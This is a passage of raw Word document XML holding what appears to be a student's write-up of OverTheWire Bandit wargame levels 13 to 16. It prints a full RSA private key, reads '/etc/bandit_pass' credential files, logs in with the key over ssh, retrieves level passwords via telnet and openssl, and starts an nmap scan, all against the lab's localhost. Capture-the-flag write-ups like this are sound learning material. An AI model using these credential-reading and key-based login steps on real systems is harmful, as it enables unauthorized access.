      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. I saw there was only one file: </w:t>
      </w:r>
      <w:r w:rsidR="004711DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="004711DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sshkey.private</w:t>
      </w:r>
      <w:r w:rsidR="004711DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="004711DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB0FBA0" w14:textId="12B1FB53" w:rsidR="00787DE5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51035C98" w14:textId="052B76AB" w:rsidR="00787DE5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used the command </w:t>
      </w:r>
      <w:r w:rsidRPr="004711DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat sshkey.private</w:t>
      </w:r>
      <w:r w:rsidRPr="004711DF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>for displaying the file context, and I got the following output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2C7606" w14:textId="0CE00F4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 xml:space="preserve"> -----BEGIN RSA PRIVATE KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB88BE2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MIIEpAIBAAKCAQEAxkkOE83W2cOT7IWhFc9aPaaQmQDdgzuXCv+ppZHa++buSkN+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDB56C9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gg0tcr7Fw8NLGa5+Uzec2rEg0WmeevB13AIoYp0MZyETq46t+jk9puNwZwIt9XgB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189D3643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ZufGtZEwWbFWw/vVLNwOXBe4UWStGRWzgPpEeSv5Tb1VjLZIBdGphTIK22Amz6Zb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623768A0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ThMsiMnyJafEwJ/T8PQO3myS91vUHEuoOMAzoUID4kN0MEZ3+XahyK0HJVq68KsV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B5BC7D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ObefXG1vvA3GAJ29kxJaqvRfgYnqZryWN7w3CHjNU4c/2Jkp+n8L0SnxaNA+WYA7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110CAC47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jiPyTF0is8uzMlYQ4l1Lzh/8/MpvhCQF8r22dwIDAQABAoIBAQC6dWBjhyEOzjeA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E39E15C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J3j/RWmap9M5zfJ/wb2bfidNpwbB8rsJ4sZIDZQ7XuIh4LfygoAQSS+bBw3RXvzE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D874E6D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pvJt3SmU8hIDuLsCjL1VnBY5pY7Bju8g8aR/3FyjyNAqx/TLfzlLYfOu7i9Jet67</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD89ACA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xAh0tONG/u8FB5I3LAI2Vp6OviwvdWeC4nOxCthldpuPKNLA8rmMMVRTKQ+7T2VS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B72680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lastRenderedPageBreak/>
        <w:t>nXmwYckKUcUgzoVSpiNZaS0zUDypdpy2+tRH3MQa5kqN1YKjvF8RC47woOYCktsD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774CE4A6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o3FFpGNFec9Taa3Msy+DfQQhHKZFKIL3bJDONtmrVvtYK40/yeU4aZ/HA2DQzwhe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BECA0B9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ol1AfiEhAoGBAOnVjosBkm7sblK+n4IEwPxs8sOmhPnTDUy5WGrpSCrXOmsVIBUf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDED31E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laL3ZGLx3xCIwtCnEucB9DvN2HZkupc/h6hTKUYLqXuyLD8njTrbRhLgbC9QrKrS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4255EDAE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M1F2fSTxVqPtZDlDMwjNR04xHA/fKh8bXXyTMqOHNJTHHNhbh3McdURjAoGBANkU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758C067F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1hqfnw7+aXncJ9bjysr1ZWbqOE5Nd8AFgfwaKuGTTVX2NsUQnCMWdOp+wFak40JH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E2319F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PKWkJNdBG+ex0H9JNQsTK3X5PBMAS8AfX0GrKeuwKWA6erytVTqjOfLYcdp5+z9s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B96616C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8DtVCxDuVsM+i4X8UqIGOlvGbtKEVokHPFXP1q/dAoGAcHg5YX7WEehCgCYTzpO+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33246312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xysX8ScM2qS6xuZ3MqUWAxUWkh7NGZvhe0sGy9iOdANzwKw7mUUFViaCMR/t54W1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F98687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GC83sOs3D7n5Mj8x3NdO8xFit7dT9a245TvaoYQ7KgmqpSg/ScKCw4c3eiLava+J</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AAAC7B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3btnJeSIU+8ZXq9XjPRpKwUCgYA7z6LiOQKxNeXH3qHXcnHok855maUj5fJNpPbY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA7B071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iDkyZ8ySF8GlcFsky8Yw6fWCqfG3zDrohJ5l9JmEsBh7SadkwsZhvecQcS9t4vby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1228BD04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9/8X4jS0P8ibfcKS4nBP+dT81kkkg5Z5MohXBORA7VWx+ACohcDEkprsQ+w32xeD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE7ED63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qT1EvQKBgQDKm8ws2ByvSUVs9GjTilCajFqLJ0eVYzRPaY6f++Gv/UVfAPV4c+S0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8ACBE0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kAWpXbv5tbkkzbS0eaLPTKgLzavXtQoTtKwrjpolHKIHUz6Wu+n4abfAIRFubOdN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F371AF3" w14:textId="77777777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/+aLoRQ0yBDRbdXMsZN/jvY44eM+xRLdRVyMmdPtP8belRi2E2aEzA==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E334C91" w14:textId="0AB6D536" w:rsidR="00787DE5" w:rsidRPr="004711DF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-----END RSA PRIVATE KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231E37DC" w14:textId="5951B216" w:rsidR="00787DE5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2E29D48E" w14:textId="1A2D4ABD" w:rsidR="00787DE5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After I read a little about the ssh command, I understand I can log into bandit14 user by using the command and </w:t>
      </w:r>
      <w:r w:rsidR="004711DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>the private ssh key using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211F1CA9" w14:textId="4CEBE846" w:rsidR="004711DF" w:rsidRPr="004711DF" w:rsidRDefault="004711DF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4711DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>ssh -i sshkey.private bandit14@localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC1CBD7" w14:textId="47FBC771" w:rsidR="004711DF" w:rsidRDefault="004711DF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I got the following output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED3855C" w14:textId="0E76A36C" w:rsidR="004711DF" w:rsidRPr="004711DF" w:rsidRDefault="004711DF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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="004711DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Could not create directory '/home/bandit13/.ssh'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B01409" w14:textId="77777777" w:rsidR="004711DF" w:rsidRPr="004711DF" w:rsidRDefault="004711DF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The authenticity of host 'localhost (127.0.0.1)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FD4940" w14:textId="77777777" w:rsidR="004711DF" w:rsidRPr="004711DF" w:rsidRDefault="004711DF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ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6040D2" w14:textId="01CACF96" w:rsidR="00787DE5" w:rsidRDefault="004711DF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711DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Are you sure you want to continue connecting (yes/no)?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8A6B02" w14:textId="77777777" w:rsidR="004711DF" w:rsidRPr="004711DF" w:rsidRDefault="004711DF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0D425C32" w14:textId="0B5D7268" w:rsidR="00787DE5" w:rsidRDefault="004711DF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entered </w:t>
      </w:r>
      <w:r w:rsidRPr="004711DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then pressed enter - I logged into bandit14 user!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E019816" w14:textId="0AB71C0F" w:rsidR="00787DE5" w:rsidRDefault="00787DE5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t xml:space="preserve">For displaying the next level password, I entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="004711DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat /etc/bandit_pass/bandit14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. The output for that command was: </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk20604541"/>
      <w:r w:rsidRPr="00787DE5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="004711DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBC20A7" w14:textId="253D6FCA" w:rsidR="004711DF" w:rsidRDefault="004711DF" w:rsidP="00787DE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1BE702E1" w14:textId="104005F9" w:rsidR="004711DF" w:rsidRDefault="004711DF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4711DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0331D995" w14:textId="6A189303" w:rsidR="004711DF" w:rsidRDefault="005C1040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First, I tried log in again using the </w:t>
      </w:r>
      <w:r w:rsidRPr="000F5089">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command by it didn’t work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDFA0A8" w14:textId="77777777" w:rsidR="005C1040" w:rsidRDefault="005C1040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Then I tried to do the same thing with the </w:t>
      </w:r>
      <w:r w:rsidRPr="000F5089">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>telnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5963B80D" w14:textId="77777777" w:rsidR="005C1040" w:rsidRDefault="005C1040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entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C16E55">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>telnet localhost 30000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135A0950" w14:textId="77777777" w:rsidR="005C1040" w:rsidRDefault="005C1040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And got the output: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17257152" w14:textId="77777777" w:rsidR="00C16E55" w:rsidRPr="00C16E55" w:rsidRDefault="00C16E55" w:rsidP="00C16E5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C16E55">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Trying 127.0.0.1...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127926F7" w14:textId="77777777" w:rsidR="00C16E55" w:rsidRPr="00C16E55" w:rsidRDefault="00C16E55" w:rsidP="00C16E5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C16E55">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Connected to localhost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8F554B" w14:textId="4CD892D8" w:rsidR="005C1040" w:rsidRDefault="00C16E55" w:rsidP="00C16E5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C16E55">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Escape character is '^]'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFAC7BA" w14:textId="77777777" w:rsidR="005C1040" w:rsidRDefault="005C1040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3553D69E" w14:textId="77777777" w:rsidR="00C16E55" w:rsidRDefault="00C16E55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After a try, I understand I need to enter a password (with incorrect password I got the output: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C16E55">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wrong! Please enter the correct current password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF67BB0" w14:textId="75C82C68" w:rsidR="005C1040" w:rsidRDefault="00C16E55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So, </w:t>
      </w:r>
      <w:r w:rsidR="005C1040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>I entered the current level password (</w:t>
      </w:r>
      <w:r w:rsidR="005C1040" w:rsidRPr="005C1040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e</w:t>
      </w:r>
      <w:r w:rsidR="005C1040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>) and got the next level password:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C1040" w:rsidRPr="005C1040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>BfMYroe26WYalil77FoDi9qh59eK5xNr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5C8818" w14:textId="54C35CCA" w:rsidR="00100417" w:rsidRDefault="00100417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100417">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bandit15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CB9CE7" w14:textId="231392B8" w:rsidR="00100417" w:rsidRDefault="000C75D1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read a little about the command openssl and s_client (using the </w:t>
      </w:r>
      <w:r w:rsidRPr="000F5089">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>man</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command)..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C5F13D" w14:textId="77777777" w:rsidR="00F05BD0" w:rsidRDefault="000F5089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Then for retrieving the password, I entered the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F0520B" w14:textId="0CB4DE6F" w:rsidR="000C75D1" w:rsidRDefault="000F5089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0F5089">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl s_client </w:t>
      </w:r>
      <w:r w:rsidR="00F05BD0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">-connect </w:t>
      </w:r>
      <w:r w:rsidRPr="000F5089">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>localhost:30001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE3D0CD" w14:textId="3237944E" w:rsidR="000F5089" w:rsidRDefault="000F5089" w:rsidP="000F5089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And then the current level password (</w:t>
      </w:r>
      <w:r w:rsidRPr="000F5089">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BfMYroe26WYalil77FoDi9qh59eK5xNr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3DC646" w14:textId="13C60527" w:rsidR="000F5089" w:rsidRDefault="000F5089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t xml:space="preserve">The output was: </w:t>
      </w:r>
      <w:r w:rsidRPr="000F5089">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cluFn7wTiGryunymYOu4RcffSxQluehd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC072C0" w14:textId="27FEF177" w:rsidR="000F5089" w:rsidRDefault="000F5089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7A82212B" w14:textId="3053F19B" w:rsidR="000F5089" w:rsidRDefault="000F5089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0F5089">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F68910A" w14:textId="2BC21C2A" w:rsidR="000F5089" w:rsidRPr="00C102AC" w:rsidRDefault="00C102AC" w:rsidP="004711D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For getting all open ports</w:t>
      </w:r>
      <w:r w:rsidR="005A4A45">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, I entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C102AC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>nmap -p31000-32000</w:t>
      </w:r>
      <w:r w:rsidRPr="00C102AC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A4A45">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and got the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C102AC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>following output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E52E5C0" w14:textId="410E3FEB" w:rsidR="00C102AC" w:rsidRPr="00C102AC" w:rsidRDefault="00A01145" w:rsidP="00C102A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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00C102AC" w:rsidRPr="00C102AC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Starting Nmap 7.40 ( https://nmap.org ) at 2019-09-29 08:48 CEST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D44CC52" w14:textId="77777777" w:rsidR="00C102AC" w:rsidRPr="00C102AC" w:rsidRDefault="00C102AC" w:rsidP="00C102A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102AC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nmap scan report for localhost (127.0.0.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235F29E7" w14:textId="77777777" w:rsidR="00C102AC" w:rsidRPr="00C102AC" w:rsidRDefault="00C102AC" w:rsidP="00C102A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102AC">
        <w:rPr>
